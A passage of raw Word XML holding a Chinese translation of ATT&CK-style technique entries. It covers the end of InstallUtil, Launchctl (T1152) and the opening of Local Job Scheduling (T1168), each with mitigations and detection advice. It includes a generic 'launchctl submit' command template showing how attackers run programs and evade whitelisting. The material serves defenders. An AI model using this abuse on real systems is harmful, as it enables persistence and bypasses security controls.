            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="093CD0BB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="39F46F26" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A7F14E2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特性</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>程序禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>或移除</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58511737" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在给定环境中可能不需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>InstallUtil</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="4B222FC4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7158DA4C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78BB791C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>给定的系统或网络不需要</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>InstallUtil.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，使用应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来防止攻击者滥用它。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="798F5122" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A288AE1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5064813A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来检测和分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>InstallUtil.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的执行和参数。将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>InstallUtil.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的最近调用与已知恰当参数及已加载文件的历史记录进行比较来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常和潜藏的攻击活动。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>InstallUtil.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用之前和之后使用的命令参数也可用于确定正在执行的二进制文件的来源和目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABE5D58" w14:textId="7D28EC2A" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Launchctl</w:t>
      </w:r>
      <w:r w:rsidR="00C775B1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="5B4E2CCD" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="340FD98D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>: T1152</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F19D53B" w14:textId="0F96EEE0" w:rsidR="000F2665" w:rsidRDefault="00EB54DA" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00B438B1">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D161E8F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="549F43E4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> User, Administrator</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CFC6A0D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>数据源：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A7D67F6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>支持远程：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="380A304B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过的防护：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用白名单</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程白名单</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件名或文件路径白名单</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79EB84AF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007C37D3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61199ECB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EEDC849" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00134C92" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Launchctl</w:t>
      </w:r>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>macOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上启动代理和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务的加载程序，但是它自身也可执行其它命令或程序。</w:t>
      </w:r>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Launchctl</w:t>
      </w:r>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持在命令行中使用子命令，以交互方式运行甚至直接从标准输入重定向。通过加载或重加载要启动的代理和服务，恶意者可以做系统修改并持久化</w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="4F7CAC"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Launchctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令非常简单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>launchctl submit -l-- /Path/to/thing/to/execute "arg" "arg" "arg"</w:t>
      </w:r>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。加载、卸载、或重新加载要启动的代理或服务可能需要提权。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732959A1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意者可以滥用该功能以执行代码，甚至当</w:t>
      </w:r>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>launchctl</w:t>
      </w:r>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属于白名单项时通过它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行程序可</w:t>
      </w:r>
      <w:r w:rsidRPr="00134C92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过系统的白名单校验机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14606FC6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="60581009" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="52ACC330" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="48C8F47C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="007C37D3" w14:paraId="3E6C0A54" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D6C250D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007C37D3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28D64043" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007C37D3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁止用户安装他们自己的启动代理和启动服务，要求他们遵循下发的组策略。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51D51700" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E036B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00470CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Knock Knock</w:t>
      </w:r>
      <w:r w:rsidRPr="00470CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00470CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>launchctl</w:t>
      </w:r>
      <w:r w:rsidRPr="00470CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装启动代理或启动服务的驻留程序。另外，每个启动代理或启动服务都有可被监控的</w:t>
      </w:r>
      <w:r w:rsidRPr="00470CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>plist</w:t>
      </w:r>
      <w:r w:rsidRPr="00470CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件位于磁盘上。监控由</w:t>
      </w:r>
      <w:r w:rsidRPr="00470CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>launchctl/launchd</w:t>
      </w:r>
      <w:r w:rsidRPr="00470CC8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动的非常见或未知进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129FCA8C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172A1C07" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D796D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地作业调度</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="6DC9A2F8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4581F0BD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>: T1168</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24FD6558" w14:textId="1A47E4DB" w:rsidR="000F2665" w:rsidRDefault="003409A7" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B438B1">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              </w:rPr>
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidR="000F2665">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28259CEA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Linux, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46017C79" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007C37D3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r>
              <w:t>, root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42110207" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
